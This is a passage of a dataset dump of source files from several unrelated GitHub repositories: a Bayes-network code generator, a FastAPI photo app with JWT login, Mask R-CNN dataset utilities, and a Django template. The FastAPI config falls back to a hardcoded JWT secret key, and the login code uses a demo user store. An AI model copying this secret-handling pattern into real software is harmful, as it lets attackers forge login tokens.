k, v, i in zip(keys, values, range(2, len(values) + 2)):\n if k is not None:\n current_k = k.split(\" \")[0].upper()\n key_value_dict[current_k] = {v.split(\" \")[0].upper():i - 2}\n else:\n key_value_dict[current_k][v.split(\" \")[0].upper()] = i - 2\n\n # Read the probabilty\n disease = []\n prob = []\n for row in rows[2:]:\n row_values = [c.value for c in row if c.value is not None]\n\n if len(row_values) ==0:\n break\n\n if row_values[0] is None:\n break\n disease.append(row_values[0])\n prob.append(row_values[1:])\n prob = np.array(prob)\n prob = prob/100.0\n\n return disease, prob, key_value_dict\n\n def sheet_to_class(self, table_file, tableName, classFileName, className):\n # tableDir = \"/home/jiancong/Desktop/projects/BayesNet/NaiveBayes/BasalGanglia/BG_Bayesian_network_NaiveBayes.xlsx\"\n # tableName = \"BGnetwork\"\n\n file = open(classFileName,\"w+\")\n\n self.filename = table_file\n self.name = tableName\n self.modified = time.time()\n\n wb=openpyxl.load_workbook(table_file)\n worksheet = wb[tableName]\n\n\n #Read the keys\n rows = list(worksheet.rows)\n first_row = rows[0]\n second_row = rows[1]\n\n # Read the diagnoses and priors\n diagnoses = []\n prior = []\n probTable = []\n for row in rows[2:]:\n row_values = [c.value for c in row if c.value is not None]\n\n if len(row_values) ==0:\n break\n\n if row_values[0] is None:\n break\n diagnoses.append(row_values[0])\n prior.append(row_values[1])\n probTable.append(row_values[2:])\n probTable = np.array(probTable)/100.0\n\n prior = np.array(prior)\n prior = prior/100.0\n states = []\n for d in diagnoses:\n dx = \"\\'\" + d + \"\\'\"\n states.append(dx)\n states = \",\".join(states)\n priorString = \"[\"\n for i in range(len(prior) ):\n if ( i > 0 ):\n priorString += \",\"\n priorString += str(prior[i])\n priorString += \"]\"\n\n print(probTable)\n\n\n\n\n file.write( \"from easybayesy import NaiveBayesNetworkNode, NaiveBayesNetwork\\n\")\n file.write( \"import numpy as np\\n\")\n file.write( \"import openpyxl\\n\")\n file.write( \"from openpyxl import Workbook, load_workbook\\n\\n\")\n\n file.write( \"def \" + className + \"(): \\n \")\n file.write( \" network = NaiveBayesNetwork(); \\n\\n\" )\n\n file.write( \" dx = NaiveBayesNetworkNode(\\'Diagnosis\\'\" + \",[\" + states + \"]) \\n\" )\n file.write( \" dx.category=\\'Diagnosis\\' \\n\" )\n file.write( \" nDx = \" + str(len(diagnoses)) + \"\\n\" )\n file.write( \" dx.priors = np.array( \" + priorString + \") \\n\" )\n\n file.write( \" network.add_node(dx) \\n\\n\")\n\n nDx = len(diagnoses)\n\n\n keys = [c.value for c in first_row]\n values = [c.value for c in second_row]\n\n values = [v for v in values if v is not None]\n keys = keys[:len(values)]\n\n values = values[2:]\n keys = keys[2:]\n\n key_value_dict = {}\n\n current_k = \"\"\n for k, v, i in zip(keys, values, range(2, len(values) + 2)):\n if k is not None:\n current_k = k.split(\" \")[0]\n print(current_k)\n key_value_dict[current_k] = {v.split(\" \")[0]:i - 2}\n\n else:\n key_value_dict[current_k][v.split(\" \")[0]] = i - 2\n\n\n categories = []\n for k in key_value_dict.keys():\n vals = key_value_dict[k]\n print(k)\n print(vals.values())\n kProbs = []\n for v in vals.values():\n kProbs.append( probTable[:,v])\n kProbs = np.array(kProbs)\n print(kProbs)\n\n kProbString = \"[ \"\n for i in range(kProbs.shape[0]):\n kProbString += \"[ \"\n for j in range(kProbs.shape[1]):\n p = kProbs[i,j]\n kProbString += str(p)\n if ( j < kProbs.shape[1]-1 ):\n kProbString += \",\"\n else:\n kProbString += \" ]\"\n if ( i < kProbs.shape[0]-1 ):\n kProbString += \", \"\n else:\n kProbString += \" ]\"\n\n nodeName = k.split(\":\")[1]\n nodeCat = k.split(\":\")[0]\n categories.append(nodeCat)\n\n states = []\n probs = np.array( (len(vals), nDx ))\n for v in vals:\n state = \"\\'\" + str(v) + \"\\'\"\n states.append(state)\n\n states = \",\".join(states)\n\n file.write( \" n = NaiveBayesNetworkNode('\" + nodeName + \"'\" + \",[\" + states + \"]) \\n\" )\n file.write( \" n.category = '\" + nodeCat + \"'\\n\");\n file.write( \" n.parent = \\'Diagnosis\\' \\n\" )\n file.write( \" n.probs = np.array( \" + kProbString + \").transpose() \\n\")\n file.write( \" network.add_node(n) \\n\\n\")\n\n file.write( \" network.categories = ['Signal', 'Spatial', 'Clinical'] \\n\" )\n file.write( \" return network\\n\");\n\n file.close()\n return 0\n\n #return disease, prob, key_value_dict\n"
}
] | 4 |
santosh/picturesfast
|
https://github.com/santosh/picturesfast
|
706cc72a4933fb3e64fa119f176a334fba1350e0
|
72394533dfc06ce5c3cf5f467c87d757537cf221
|
c3673b5b982e0f0edda263ace372df0db63440a7
|
refs/heads/master
| 2023-08-01T02:52:36.178084 | 2021-09-04T03:28:37 | 2021-09-04T03:29:15 | 402,948,952 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7927135825157166,
"alphanum_fraction": 0.7927135825157166,
"avg_line_length": 33.60869598388672,
"blob_id": "03e3b7d7f4f95a89ff14b1f711de6a1195367c84",
"content_id": "dce576eebb94e2e0634b4af7ccf4c232f90f229b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 796,
"license_type": "no_license",
"max_line_length": 200,
"num_lines": 23,
"path": "/README.md",
"repo_name": "santosh/picturesfast",
"src_encoding": "UTF-8",
"text": "# santosh.pictures\n\n<santosh.pictures> is a photo management application originally written in Go, but ported to FastAPI in early stage. It uses Postgres for storing metadata of the images and the application's own data.\n\n## Stack\n\n- FastAPI backend.\n- Microservices architecture with Bealstalk as platform.\n- Database runs on different container in same beanstalk environment.\n- Traefik - TODO: Let's Encrypt\n\n## Development\n\n* We use `tiangolo/sqlmodel` for both validation and data modeling. `sqlmodel` brings pydantic and SQLAlchemy together.\n\n## Metadata\n\nThis project is a part of application I developed during AWS Certified Developer Assciate Exam. \n\nStrategies for application growth:\n\n- Deploy it on Elastic Beanstalk and have it scale\n- Try decoupling components sub/pub architecture.\n"
},
{
"alpha_fraction": 0.611872136592865,
"alphanum_fraction": 0.8082191944122314,
"avg_line_length": 42.79999923706055,
"blob_id": "d4c6df0b988dad8ee45034afad5656765564d92f",
"content_id": "fbe3af9025e62cd2cf7e9ab37be7069ec885c208",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 219,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 5,
"path": "/backend/config/config.py",
"repo_name": "santosh/picturesfast",
"src_encoding": "UTF-8",
"text": "import os\n\nPICTURES_SECRET_KEY = os.getenv(\"PICTURES_SECRET_KEY\", \"ac9dd0517ef9da9bd6a53c0d92f461f333037ea922f590a28c20f1f0fa6f102a\")\nJWT_ALGORITHM = os.getenv(\"JWT_ALGORITHM\", \"HS256\")\nACCESS_TOKEN_EXPIRE_MINUTES = 30\n"
},
{
"alpha_fraction": 0.7682020664215088,
"alphanum_fraction": 0.7726597189903259,
"avg_line_length": 25.920000076293945,
"blob_id": "d1c7076bd41f00b6a15b74b993fc25f7479ec4f6",
"content_id": "e2d1fd645d6568ecac0b94049eb32577d1ccddd3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 673,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 25,
"path": "/backend/main.py",
"repo_name": "santosh/picturesfast",
"src_encoding": "UTF-8",
"text": "from datetime import timedelta\n\nfrom fastapi import FastAPI, APIRouter, Depends, Request, HTTPException, status\nfrom fastapi.templating import Jinja2Templates\nfrom fastapi.responses import HTMLResponse\n\n# from routers import photo\nfrom routers import user\n\n# from db import models\n\napp = FastAPI()\n\ntemplates = Jinja2Templates(directory=\"templates\")\n\[email protected](\"/\", response_class=HTMLResponse)\nasync def get_homepage(request: Request):\n return templates.TemplateResponse(\"index.html\", { \"request\": request })\n\n\n# /api router\napi = APIRouter()\napp.include_router(user.router)\n# api.include_router(photo.router, prefix=\"/photos\")\napp.include_router(api, prefix=\"/api/v1\")\n"
},
{
"alpha_fraction": 0.5390428304672241,
"alphanum_fraction": 0.5994962453842163,
"avg_line_length": 21.05555534362793,
"blob_id": "c54100b05e169c8e136ecd7ca8307076c3bfe0d3",
"content_id": "cdaae55c91fabb499869b460e07f742f7fa375ad",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TOML",
"length_bytes": 397,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 18,
"path": "/backend/Pipfile",
"repo_name": "santosh/picturesfast",
"src_encoding": "UTF-8",
"text": "[[source]]\nurl = \"https://pypi.org/simple\"\nverify_ssl = true\nname = \"pypi\"\n\n[packages]\nfastapi = \"==0.68.0\"\njinja2 = \"==3.0.1\"\nuvicorn = {extras = [\"standard\"], version = \"==0.14.0\"}\nsqlalchemy = \"==1.4.22\"\npasslib = {extras = [\"bcrypt\"], version = \"*\"}\npython-multipart = \"==0.0.5\"\npython-jose = {extras = [\"cryptography\"], version = \"==3.3.0\"}\n\n[dev-packages]\n\n[requires]\npython_version = \"3.7\"\n"
},
{
"alpha_fraction": 0.6780444979667664,
"alphanum_fraction": 0.6820083856582642,
"avg_line_length": 30.971830368041992,
"blob_id": "da6500156e1c50c90cc6a754302918760289eafa",
"content_id": "a612a40fde3f349c62f1e85c1ffba40a5a0c0f62",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4541,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 142,
"path": "/backend/routers/user.py",
"repo_name": "santosh/picturesfast",
"src_encoding": "UTF-8",
"text": "from datetime import datetime, timedelta\nfrom typing import Optional\nfrom pydantic import BaseModel\nfrom passlib.context import CryptContext\nfrom fastapi import Depends, HTTPException, APIRouter, status\nfrom fastapi.security import OAuth2PasswordBearer, OAuth2PasswordRequestForm\nfrom jose import JWTError, jwt\n\nimport config\n\nfake_users_db = {\n \"johndoe\": {\n \"username\": \"johndoe\",\n \"full_name\": \"John Doe\",\n \"email\": \"[email protected]\",\n \"hashed_password\": \"$2b$12$EixZaYVK1fsbw1ZfbX3OXePaWxn96p36WQoeG6Lruj3vjPGga31lW\",\n \"disabled\": False,\n },\n}\n\n# uses bcrypt for hashing password\npwd_context = CryptContext(schemes=[\"bcrypt\"], deprecated=\"auto\")\noauth2_scheme = OAuth2PasswordBearer(tokenUrl=\"token\")\n\nclass User(BaseModel):\n username: str\n email: Optional[str] = None\n first_name: Optional[str] = None\n last_name: Optional[str] = None\n disabled: Optional[bool] = None\n\nclass UserInDB(User):\n hashed_password: str\n\nclass Token(BaseModel):\n access_token: str\n token_type: str\n\nclass TokenData(BaseModel):\n username: Optional[str] = None\n\n\ndef verify_password(plain_password, hashed_password):\n return pwd_context.verify(plain_password, hashed_password)\n\ndef get_password_hash(password):\n return pwd_context.hash(password)\n\ndef get_user(db, username: str):\n if username in db:\n user_dict = db[username]\n return UserInDB(**user_dict)\n\ndef authenticate_user(db, username: str, password: str):\n user = get_user(db, username)\n if not user:\n return False\n if not verify_password(password, user.hashed_password):\n return False\n return user\n\ndef create_access_token(data: dict, expires_delta: Optional[timedelta] = None):\n to_encode = data.copy()\n if expires_delta:\n expire = datetime.utcnow() + expires_delta\n else:\n expire = datetime.utcnow() + timedelta(minutes=config.ACCESS_TOKEN_EXPIRE_MINUTES)\n to_encode.update({\"exp\": expire})\n encoded_jwt = jwt.encode(to_encode, config.PICTURES_SECRET_KEY, algorithm=config.JWT_ALGORITHM)\n return encoded_jwt\n\nasync def get_current_user(token: str = Depends(oauth2_scheme)):\n credentials_exception = HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"Invalid authentication credentials\",\n headers={\"WWW-Authentication credentials\"},\n )\n\n try:\n payload = jwt.decode(token, config.PICTURES_SECRET_KEY, algorithms=[config.JWT_ALGORITHM])\n username: str = payload.get(\"sub\")\n if username is None:\n raise credentials_exception\n token_data = TokenData(username=username)\n except JWTError:\n raise credentials_exception\n\n user = get_user(fake_users_db, username=token_data.username)\n\n if not user:\n raise credentials_exception\n return user\n\nasync def get_current_active_user(current_user: User = Depends(get_current_user)):\n if current_user.disabled:\n raise HTTPException(status_code=400, detail=\"Inactive user\")\n return current_user\n\n\nrouter = APIRouter()\n\n# POST /user/login\[email protected](\"/token\", tags=[\"users\"], summary=\"Login an existing user\")\nasync def login_for_access_token(form_data: OAuth2PasswordRequestForm = Depends()):\n \"\"\"Login a user given the username and password. A JWT token\n is sent on the success, or 401 response on failure.\n\n - **username**: username to login with\n - **password**: password for username\n \"\"\"\n user = authenticate_user(fake_users_db, form_data.username, form_data.password)\n if not user:\n raise HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"Incorrect surename or password\",\n headers={\"WWW-Authenticate\": \"Bearer\"}\n )\n access_token_expires = timedelta(minutes=config.ACCESS_TOKEN_EXPIRE_MINUTES)\n access_token = create_access_token(\n data={\"sub\": user.username}, expires_delta=access_token_expires\n )\n\n return {\"access_token\": access_token, \"token_type\": \"bearer\"}\n\n\[email protected](\"/me\", response_model=User, tags=[\"users\"], summary=\"Login an existing user\")\nasync def get_logged_in_user(current_user: User = Depends(get_current_active_user)):\n return current_user\n\n\n# POST /user/register\n# @router.post(\"/\", tags=[\"users\"], summary=\"Register a new user\")\n# async def login_user(request: Request, user: User):\n# \"\"\"Register a new user. A username, password and email is required.\n\n# - **username**: username to login with\n# - **password**: password for username\n# - **email**: email of username\n# \"\"\"\n# pass\n\n# GET /user/profile/:id\n\n"
}
] | 5 |
yenchenlin/maskrcnn-benchmark
|
https://github.com/yenchenlin/maskrcnn-benchmark
|
93ec53314c4f3240ce177cef0cc3600a5d2be494
|
d8f34136c719190770d1f2ecccdbe13c9a8ee025
|
df2e58d6f7966e48f7a977b3471669bfeabab900
|
refs/heads/master
| 2020-04-25T06:56:16.571468 | 2019-02-26T20:50:40 | 2019-02-26T20:50:40 | 172,598,115 | 1 | 0 |
MIT
| 2019-02-25T22:50:42 | 2019-02-25T18:25:52 | 2019-02-25T20:44:01 | null |
[
{
"alpha_fraction": 0.6401017308235168,
"alphanum_fraction": 0.6477320790290833,
"avg_line_length": 29.636363983154297,
"blob_id": "144da156423789ed21c78045672b861c4ea7e855",
"content_id": "d84a69a8dc5aa9bb8e807a7fcecbd36c6cf33247",
"detected_licenses": [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2359,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 77,
"path": "/maskrcnn_benchmark/data/datasets/omnipush.py",
"repo_name": "yenchenlin/maskrcnn-benchmark",
"src_encoding": "UTF-8",
"text": "# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.\nimport torch\nimport torchvision\nimport numpy as np\nimport glob\nimport os\n\nfrom PIL import Image\nfrom torch.utils.data import Dataset\nfrom maskrcnn_benchmark.structures.bounding_box import BoxList\nfrom maskrcnn_benchmark.structures.center import Center\n\n\nmin_keypoints_per_image = 1\n\n\ndef _count_visible_keypoints(anno):\n return sum(sum(1 for v in ann[\"keypoints\"][2::3] if v > 0) for ann in anno)\n\n\ndef _has_only_empty_bbox(anno):\n return all(any(o <= 1 for o in obj[\"bbox\"][2:]) for obj in anno)\n\n\ndef has_valid_annotation(anno):\n # if it's empty, there is no annotation\n if len(anno) == 0:\n return False\n # if all boxes have close to zero area, there is no annotation\n if _has_only_empty_bbox(anno):\n return False\n # keypoints task have a slight different critera for considering\n # if an annotation is valid\n if \"keypoints\" not in anno[0]:\n return True\n # for keypoint detection tasks, only consider valid images those\n # containing at least min_keypoints_per_image\n if _count_visible_keypoints(anno) >= min_keypoints_per_image:\n return True\n return False\n\n\nclass OmnipushDataset(Dataset):\n def __init__(self, root, ann_file, transforms=None):\n self.img_names = glob.glob(os.path.join(root, '*.jpg'))\n self.annos = np.load(ann_file).item()\n self.transforms = transforms\n\n def __len__(self):\n return len(self.img_names)\n\n def __getitem__(self, idx):\n img = Image.open(self.img_names[idx]).convert('RGB')\n anno = self.annos[self.img_names[idx].split('/')[-1]]\n\n boxes = [anno['bbox']]\n boxes = torch.as_tensor(boxes).reshape(-1, 4) # guard against no boxes\n target = BoxList(boxes, img.size, mode=\"xyxy\")\n\n classes = [anno['class']]\n classes = torch.tensor(classes)\n target.add_field(\"labels\", classes)\n\n center = [anno['center']]\n center = Center(center, img.size)\n target.add_field(\"keypoints\", center)\n\n # ensure bbox is legit\n target = target.clip_to_image(remove_empty=True)\n\n if self.transforms is not None:\n img, target = self.transforms(img, target)\n\n return img, target, idx\n\n def get_img_info(self, index):\n return {\"height\": 640, \"width\": 640}\n"
},
{
"alpha_fraction": 0.5604601502418518,
"alphanum_fraction": 0.5708935260772705,
"avg_line_length": 32.98181915283203,
"blob_id": "b35a790df3a017805085e93b6a37ec498a98c12d",
"content_id": "1b7096c984a5ab3d65dcd19355691ee577d6a121",
"detected_licenses": [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3738,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 110,
"path": "/maskrcnn_benchmark/structures/center.py",
"repo_name": "yenchenlin/maskrcnn-benchmark",
"src_encoding": "UTF-8",
"text": "import torch\n\n\n# transpose\nFLIP_LEFT_RIGHT = 0\n\nclass Center(object):\n def __init__(self, keypoints, size, mode=None):\n # FIXME remove check once we have better integration with device\n # in my version this would consistently return a CPU tensor\n device = keypoints.device if isinstance(keypoints, torch.Tensor) else torch.device('cpu')\n keypoints = torch.as_tensor(keypoints, dtype=torch.float32, device=device)\n num_keypoints = keypoints.shape[0]\n if num_keypoints:\n keypoints = keypoints.view(num_keypoints, -1, 3)\n\n # TODO should I split them?\n # self.visibility = keypoints[..., 2]\n self.keypoints = keypoints# [..., :2]\n self.size = size\n self.mode = mode\n self.extra_fields = {}\n\n def crop(self, box):\n raise NotImplementedError()\n\n def resize(self, size, *args, **kwargs):\n ratios = tuple(float(s) / float(s_orig) for s, s_orig in zip(size, self.size))\n ratio_w, ratio_h = ratios\n resized_data = self.keypoints.clone()\n resized_data[..., 0] *= ratio_w\n resized_data[..., 1] *= ratio_h\n keypoints = type(self)(resized_data, size, self.mode)\n for k, v in self.extra_fields.items():\n keypoints.add_field(k, v)\n return keypoints\n\n def transpose(self, method):\n if method not in (FLIP_LEFT_RIGHT,):\n raise NotImplementedError(\n \"Only FLIP_LEFT_RIGHT implemented\")\n\n flipped_data = [[self.size[1] - self.keypoints[0, 0, 0], self.keypoints[0, 0, 1], 2.0]]\n keypoints = type(self)(flipped_data, self.size, self.mode)\n return keypoints\n\n def to(self, *args, **kwargs):\n keypoints = type(self)(self.keypoints.to(*args, **kwargs), self.size, self.mode)\n for k, v in self.extra_fields.items():\n if hasattr(v, \"to\"):\n v = v.to(*args, **kwargs)\n keypoints.add_field(k, v)\n return keypoints\n\n def __getitem__(self, item):\n keypoints = type(self)(self.keypoints[item], self.size, self.mode)\n for k, v in self.extra_fields.items():\n keypoints.add_field(k, v[item])\n return keypoints\n\n def add_field(self, field, field_data):\n self.extra_fields[field] = field_data\n\n def get_field(self, field):\n return self.extra_fields[field]\n\n def __repr__(self):\n s = self.__class__.__name__ + '('\n s += 'num_instances={}, '.format(len(self.keypoints))\n s += 'image_width={}, '.format(self.size[0])\n s += 'image_height={})'.format(self.size[1])\n return s\n\n\n# TODO make this nicer, this is a direct translation from C2 (but removing the inner loop)\ndef keypoints_to_heat_map(keypoints, rois, heatmap_size):\n if rois.numel() == 0:\n return rois.new().long(), rois.new().long()\n offset_x = rois[:, 0]\n offset_y = rois[:, 1]\n scale_x = heatmap_size / (rois[:, 2] - rois[:, 0])\n scale_y = heatmap_size / (rois[:, 3] - rois[:, 1])\n\n offset_x = offset_x[:, None]\n offset_y = offset_y[:, None]\n scale_x = scale_x[:, None]\n scale_y = scale_y[:, None]\n\n x = keypoints[..., 0]\n y = keypoints[..., 1]\n\n x_boundary_inds = x == rois[:, 2][:, None]\n y_boundary_inds = y == rois[:, 3][:, None]\n\n x = (x - offset_x) * scale_x\n x = x.floor().long()\n y = (y - offset_y) * scale_y\n y = y.floor().long()\n\n x[x_boundary_inds] = heatmap_size - 1\n y[y_boundary_inds] = heatmap_size - 1\n\n valid_loc = (x >= 0) & (y >= 0) & (x < heatmap_size) & (y < heatmap_size)\n vis = keypoints[..., 2] > 0\n valid = (valid_loc & vis).long()\n\n lin_ind = y * heatmap_size + x\n heatmaps = lin_ind * valid\n\n return heatmaps, valid\n"
}
] | 2 |
zhaoqidev/Affinity
|
https://github.com/zhaoqidev/Affinity
|
92d36bea652023eae664854412f90d34ba145b1e
|
e4d659fb7085634ea48fcbc704a1da92724e02d2
|
f653c49c1345d502d57490d150d6447681fa8c66
|
refs/heads/master
| 2020-03-08T15:56:59.967330 | 2018-04-05T15:30:44 | 2018-04-05T15:30:44 | 128,225,928 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6174496412277222,
"alphanum_fraction": 0.6191275119781494,
"avg_line_length": 26.090909957885742,
"blob_id": "01eb6fc057b3e2dad5ddc270f89a9a3d32185ef3",
"content_id": "74973d9808f0287ad3d944ebf37342331c5e1047",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 650,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 22,
"path": "/you_yuan/you_yuan/items.py",
"repo_name": "zhaoqidev/Affinity",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\n# Define here the models for your scraped items\n#\n# See documentation in:\n# https://doc.scrapy.org/en/latest/topics/items.html\n\nimport scrapy\n\n\nclass YouYuanItem(scrapy.Item):\n user_name = scrapy.Field() # 用户名\n age = scrapy.Field() # 年龄\n head_url = scrapy.Field() # 头像ur\n image_url = scrapy.Field() # 相册\n content = scrapy.Field() # 简介\n place_home = scrapy.Field() # 籍贯\n education = scrapy.Field() # 教育\n hobby = scrapy.Field() # 爱好\n source = scrapy.Field() # 主页地址\n time = scrapy.Field() # utc 时间\n spider = scrapy.Field() # 爬虫时间\n"
},
{
"alpha_fraction": 0.5537122488021851,
"alphanum_fraction": 0.5605112910270691,
"avg_line_length": 31.83035659790039,
"blob_id": "19f21a8ff2e0b69b03f925370d795de63025e564",
"content_id": "9c1ab96167cf72f53e80aabac8d88c45f4a2a239",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3699,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 112,
"path": "/you_yuan/you_yuan/spiders/my_spider.py",
"repo_name": "zhaoqidev/Affinity",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport re\nimport time\n\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import Rule\nfrom scrapy_redis.spiders import RedisCrawlSpider\n\nfrom you_yuan.items import YouYuanItem\n\n\nclass MySpiderSpider(RedisCrawlSpider):\n name = 'my'\n # allowed_domains = ['youyuan.com']\n # start_urls = ['http://youyuan.com/']\n redis_key = \"you_yuan: start spider\" # 主redis发布的令牌\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n 动态获取domain\n :param args:\n :param kwargs:\n \"\"\"\n domain = kwargs.pop('domain', '')\n self.allow_domains = filter(None, domain.strip(','))\n super(MySpiderSpider, self).__init__(*args, **kwargs)\n\n page_links = LinkExtractor(allow=r\"youyuan.com/find/beijing/mm18-26/advance-0-0-0-0-0-0-0/p\\d+/\")\n profile_links = LinkExtractor(allow=r\"youyuan.com/\\d+-profile/\")\n\n rules = (\n Rule(page_links),\n Rule(profile_links, callback='parse_item'),\n )\n\n def parse_item(self, response):\n item = YouYuanItem()\n\n item['user_name'] = self.get_user_name()\n item['age'] = self.get_age()\n item['head_url'] = self.get_header_url()\n item['image_url'] = self.get_images_url()\n item['content'] = self.get_content()\n item['place_home'] = self.get_place_from()\n item['education'] = self.get_education()\n item['hobby'] = self.get_hobby()\n item['source'] = response.url\n yield item\n\n def get_user_name(self, response):\n username = response.xpath(\"//dl[@class='personal_cen']//div[@class='main']/strong/text()\").extract()\n if len(username):\n username = username[0]\n else:\n username = \"NULL\"\n return username.strip()\n\n def get_age(self, response):\n age = response.xpath(\"//dl[@class='personal_cen']//dd/p/text()\").extract()\n if len(age):\n age = re.findall(u\"\\d+岁\", age[0])[0]\n else:\n age = \"NULL\"\n return age.strip()\n\n def get_header_url(self, response):\n header_url = response.xpath(\"//dl[@class='personal_cen']/dt/img/@src\").extract()\n if len(header_url):\n header_url = header_url[0]\n else:\n header_url = \"NULL\"\n return header_url.strip()\n\n def get_images_url(self, response):\n images_url = response.xpath(\"//div[@class='ph_show']/ul/li/a/img/@src\").extract()\n if len(images_url):\n images_url = \", \".join(images_url)\n else:\n images_url = \"NULL\"\n return images_url\n\n def get_content(self, response):\n content = response.xpath(\"//div[@class='pre_data']/ul/li/p/text()\").extract()\n if len(content):\n content = content[0]\n else:\n content = \"NULL\"\n return content.strip()\n\n def get_place_from(self, response):\n place_from = response.xpath(\"//div[@class='pre_data']/ul/li[2]//ol[1]/li[1]/span/text()\").extract()\n if len(place_from):\n place_from = place_from[0]\n else:\n place_from = \"NULL\"\n return place_from.strip()\n\n def get_education(self, response):\n education = response.xpath(\"//div[@class='pre_data']/ul/li[3]//ol[2]/li[2]/span/text()\").extract()\n if len(education):\n education = education[0]\n else:\n education = \"NULL\"\n return education.strip()\n\n def get_hobby(self, response):\n hobby = response.xpath(\"//dl[@class='personal_cen']//ol/li/text()\").extract()\n if len(hobby):\n hobby = \",\".join(hobby).replace(\" \", \"\")\n else:\n hobby = \"NULL\"\n return hobby.strip()\n"
},
{
"alpha_fraction": 0.5783783793449402,
"alphanum_fraction": 0.6202702522277832,
"avg_line_length": 20.14285659790039,
"blob_id": "91181950ca761d36093e2ff9ee6aa8b0e933c376",
"content_id": "184a939071f3136ac202f238c12f66efe030d4ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 746,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 35,
"path": "/you_yuan/process_item_for_mongo.py",
"repo_name": "zhaoqidev/Affinity",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\n\"\"\" \n@author: stromqi\n@file: process_item_for_mongo.py \n@email:[email protected]\n@time: 2018/04/05 \n@github: github.com/stromqi\n\"\"\"\n\nimport redis\nimport pymongo\nimport json\nimport scrapy.log\n\n\"\"\"\nredis mongo数据库\n\"\"\"\n\n\ndef process_item():\n redis_client = redis.Redis(host=\"127.0.0.1\", port=6379, db=\"0\")\n mongo_client = pymongo.MongoClient(host=\"127.0.0.1\", port=27017)\n db_name = mongo_client[\"youyuan\"]\n sheet_name = db_name[\"beijing_area_mm\"]\n\n while True:\n source, data = redis_client.blpop(\"yy:items\") # list[] or tuple()\n data = json.load(data)\n sheet_name.insert(data)\n scrapy.log.msg(\"log\" + source)\n scrapy.log.msg(\"log\" + data)\n\n\nif __name__ == '__main__':\n process_item()\n"
}
] | 3 |
Whiro0501/Django_SharePhoto
|
https://github.com/Whiro0501/Django_SharePhoto
|
9d7df46ee0487d8dbaf286860ac4063cf1bc04a9
|
fa4e162239094b20c58393f0baa7f8614c8de481
|
6dfdbe90dd8237ccbe15ab27b59fec2fcedeac4a
|
refs/heads/master
| 2022-12-12T12:57:38.036005 | 2020-02-16T13:51:48 | 2020-02-16T13:51:48 | 219,107,076 | 1 | 0 | null | 2019-11-02T05:13:59 | 2020-04-19T17:43:34 | 2022-12-08T05:23:35 |
C
|
[
{
"alpha_fraction": 0.513853907585144,
"alphanum_fraction": 0.5214105844497681,
"avg_line_length": 17.952381134033203,
"blob_id": "beb7e7011cb043d5419f94de6c6e27c940d68139",
"content_id": "13b7eab326f0df7e0b3d005c1cb1f61e134c6e08",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 451,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 21,
"path": "/app/templates/app/users_detail.html",
"repo_name": "Whiro0501/Django_SharePhoto",
"src_encoding": "UTF-8",
"text": "{% extends 'app/base.html' %}\n\n{% block content %}\n\n<h2 class=\"user-name\">@{{ user.username }}</h2>\n\n{% if photos.count != 0 %}\n <p>投稿<strong>{{ photos.count }}</strong>件</p>\n\n\n{% else %}\n {% if user == request.user %}\n <p>投稿が見つかりません</p>\n {% else %}\n <p>@{{ user.username }}さんはまだ投稿していません。</p>\n {% endif %}\n{% endif %}\n\n{% include 'app/photos_list.html' %}\n\n{% endblock %}"
},
{
"alpha_fraction": 0.6696990728378296,
"alphanum_fraction": 0.6696990728378296,
"avg_line_length": 56.15999984741211,
"blob_id": "24d80ece0e65e72ad2c1bf7fd79c723857f93b79",
"content_id": "7daf7df3468102b8e556377929b134cb5dcd3060",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1429,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 25,
"path": "/app/urls.py",
"repo_name": "Whiro0501/Django_SharePhoto",
"src_encoding": "UTF-8",
